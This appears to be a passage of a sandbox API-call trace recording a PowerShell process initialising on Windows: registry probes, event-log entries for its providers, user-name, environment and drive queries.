phkResult=0x1ad2f8*=0x3c0) returned 0x0 [0074.438] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2f8 | out: phkResult=0x1ad2f8*=0x0) returned 0x2 [0074.438] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2f8 | out: phkResult=0x1ad2f8*=0x3c4) returned 0x0 [0074.438] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2f8 | out: phkResult=0x1ad2f8*=0x0) returned 0x2 [0074.438] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2f8 | out: phkResult=0x1ad2f8*=0x3c8) returned 0x0 [0074.438] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2f8 | out: phkResult=0x1ad2f8*=0x0) returned 0x2 [0074.438] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2f8 | out: phkResult=0x1ad2f8*=0x3cc) returned 0x0 [0074.439] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2f8 | out: phkResult=0x1ad2f8*=0x0) returned 0x2 [0074.439] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2f8 | out: phkResult=0x1ad2f8*=0x3d0) returned 0x0 [0074.439] RegOpenKeyExW (in: hKey=0x3d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2f8 | out: phkResult=0x1ad2f8*=0x0) returned 0x2 [0074.439] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2f8 | out: phkResult=0x1ad2f8*=0x3d4) returned 0x0 [0074.439] RegOpenKeyExW (in: hKey=0x3d4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2f8 | out: phkResult=0x1ad2f8*=0x3d8) returned 0x0 [0074.439] RegCloseKey (hKey=0x3d8) returned 0x0 [0074.439] RegCloseKey (hKey=0x3b4) returned 0x0 [0074.439] RegCloseKey (hKey=0x3d4) returned 0x0 [0074.444] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b860008 [0074.447] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d3d7d0*="WSMan", lpRawData=0x3d3d540) returned 1 [0074.456] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.456] CoTaskMemFree (pv=0x3e43c0) [0074.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.459] CoTaskMemAlloc (cb=0x804) returned 0x1b3d56e0 [0074.459] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3d56e0, nSize=0x1ad588 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad588) returned 0x1 [0074.460] CoTaskMemFree (pv=0x1b3d56e0) [0074.460] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.460] GetUserNameW (in: lpBuffer=0x432650, pcbBuffer=0x1ad5c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad5c8) returned 1 [0074.460] CoTaskMemFree (pv=0x432650) [0074.461] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d42d08*="Alias", lpRawData=0x3d42a98) returned 1 [0074.462] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.463] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.463] CoTaskMemFree (pv=0x3e43c0) [0074.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.465] CoTaskMemAlloc (cb=0x804) returned 0x1b3d56e0 [0074.465] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3d56e0, nSize=0x1ad588 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad588) returned 0x1 [0074.466] CoTaskMemFree (pv=0x1b3d56e0) [0074.466] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.466] GetUserNameW (in: lpBuffer=0x432650, pcbBuffer=0x1ad5c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad5c8) returned 1 [0074.466] CoTaskMemFree (pv=0x432650) [0074.467] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d48300*="Environment", lpRawData=0x3d48090) returned 1 [0074.469] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.469] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.469] CoTaskMemFree (pv=0x3e43c0) [0074.469] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.469] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0074.470] CoTaskMemFree (pv=0x3e43c0) [0074.470] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.470] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0074.470] CoTaskMemFree (pv=0x3e43c0) [0074.470] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1ad130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0074.470] SetErrorMode (uMode=0x1) returned 0x1 [0074.470] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1ad340 | out: lpFileInformation=0x1ad340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0074.470] SetErrorMode (uMode=0x1) returned 0x1 [0074.473] GetLogicalDrives () returned 0x4 [0074.473] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1acea0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0074.474] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0074.474] SetErrorMode (uMode=0x1) returned 0x1 [0074.475] CoTaskMemAlloc (cb=0x68) returned 0x1b3cd380 [0074.475] CoTaskMemAlloc (cb=0x68) returned 0x1b3cd3f0 [0074.475] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b3cd380, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1ad310, lpMaximumComponentLength=0x1ad30c, lpFileSystemFlags=0x1ad308, lpFileSystemNameBuffer=0x1b3cd3f0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ad310*=0x9c354b42, lpMaximumComponentLength=0x1ad30c*=0xff, lpFileSystemFlags=0x1ad308*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0074.476] CoTaskMemFree (pv=0x1b3cd380) [0074.476] CoTaskMemFree (pv=0x1b3cd3f0) [0074.476] SetErrorMode (uMode=0x1) returned 0x1 [0074.476] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0074.477] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad050, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0074.477] SetErrorMode (uMode=0x1) returned 0x1 [0074.477] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad2b0 | out: lpFileInformation=0x1ad2b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0074.477] SetErrorMode (uMode=0x1) returned 0x1 [0074.477] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad050, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0074.477] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1acf00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0074.477] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0074.478] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ace30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0074.478] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0074.479] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ace80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0074.479] SetErrorMode (uMode=0x1) returned 0x1 [0074.479] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad0e0 | out: lpFileInformation=0x1ad0e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0074.479] SetErrorMode (uMode=0x1) returned 0x1 [0074.479] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ace80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0074.479] SetErrorMode (uMode=0x1) returned 0x1 [0074.479] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad0e0 | out: lpFileInformation=0x1ad0e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0074.479] SetErrorMode (uMode=0x1) returned 0x1 [0074.479] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acf20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0074.480] SetErrorMode (uMode=0x1) returned 0x1 [0074.480] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad180 | out: lpFileInformation=0x1ad180*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0074.480] SetErrorMode (uMode=0x1) returned 0x1 [0074.480] CoTaskMemAlloc (cb=0x804) returned 0x1b3d56e0 [0074.480] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3d56e0, nSize=0x1ad588 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad588) returned 0x1 [0074.481] CoTaskMemFree (pv=0x1b3d56e0) [0074.481] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.481] GetUserNameW (in: lpBuffer=0x432650, pcbBuffer=0x1ad5c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad5c8) returned 1 [0074.481] CoTaskMemFree (pv=0x432650) [0074.482] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d4f3f0*="FileSystem", lpRawData=0x3d4f180) returned 1 [0074.483] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.483] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.483] CoTaskMemFree (pv=0x3e43c0) [0074.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.485] CoTaskMemAlloc (cb=0x804) returned 0x1b3d56e0 [0074.485] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3d56e0, nSize=0x1ad588 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad588) returned 0x1 [0074.485] CoTaskMemFree (pv=0x1b3d56e0) [0074.486] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.486] GetUserNameW (in: lpBuffer=0x432650, pcbBuffer=0x1ad5c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad5c8) returned 1 [0074.486] CoTaskMemFree (pv=0x432650) [0074.486] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d54c30*="Function", lpRawData=0x3d549c0) returned 1 [0074.490] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.490] CoTaskMemFree (pv=0x3e43c0) [0074.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.577] CoTaskMemAlloc (cb=0x804) returned 0x1b3d56e0 [0074.577] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3d56e0, nSize=0x1ad588 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad588) returned 0x1 [0074.578] CoTaskMemFree (pv=0x1b3d56e0) [0074.578] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.578] GetUserNameW (in: lpBuffer=0x432650, pcbBuffer=0x1ad5c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad5c8) returned 1 [0074.578] CoTaskMemFree (pv=0x432650) [0074.578] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d77458*="Registry", lpRawData=0x3d771e8) returned 1 [0074.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.581] CoTaskMemAlloc (cb=0x804) returned 0x1b3d56e0 [0074.581] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3d56e0, nSize=0x1ad588 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad588) returned 0x1 [0074.581] CoTaskMemFree (pv=0x1b3d56e0) [0074.581] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.581] GetUserNameW (in: lpBuffer=0x432650, pcbBuffer=0x1ad5c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad5c8) returned 1 [0074.582] CoTaskMemFree (pv=0x432650) [0074.582] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d7c870*="Variable", lpRawData=0x3d7c600) returned 1 [0074.583] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.583] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.583] CoTaskMemFree (pv=0x3e43c0) [0074.584] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.584] CoTaskMemFree (pv=0x3e43c0) [0074.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ace30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0074.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1acd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0074.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1acd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0074.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1acd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0074.617] CoTaskMemAlloc (cb=0x804) returned 0x1b3d56e0 [0074.617] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3d56e0, nSize=0x1ad588 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad588) returned 0x1 [0074.617] CoTaskMemFree (pv=0x1b3d56e0) [0074.617] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.617] GetUserNameW (in: lpBuffer=0x432650, pcbBuffer=0x1ad5c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad5c8) returned 1 [0074.618] CoTaskMemFree (pv=0x432650) [0074.618] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d90488*="Certificate", lpRawData=0x3d90218) returned 1 [0074.623] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.623] CoTaskMemFree (pv=0x3e43c0) [0074.626] GetLogicalDrives () returned 0x4 [0074.626] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ad210, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0074.626] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0074.628] CoTaskMemAlloc (cb=0x20e) returned 0x472540 [0074.628] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x472540 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0074.628] CoTaskMemFree (pv=0x472540) [0074.629] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 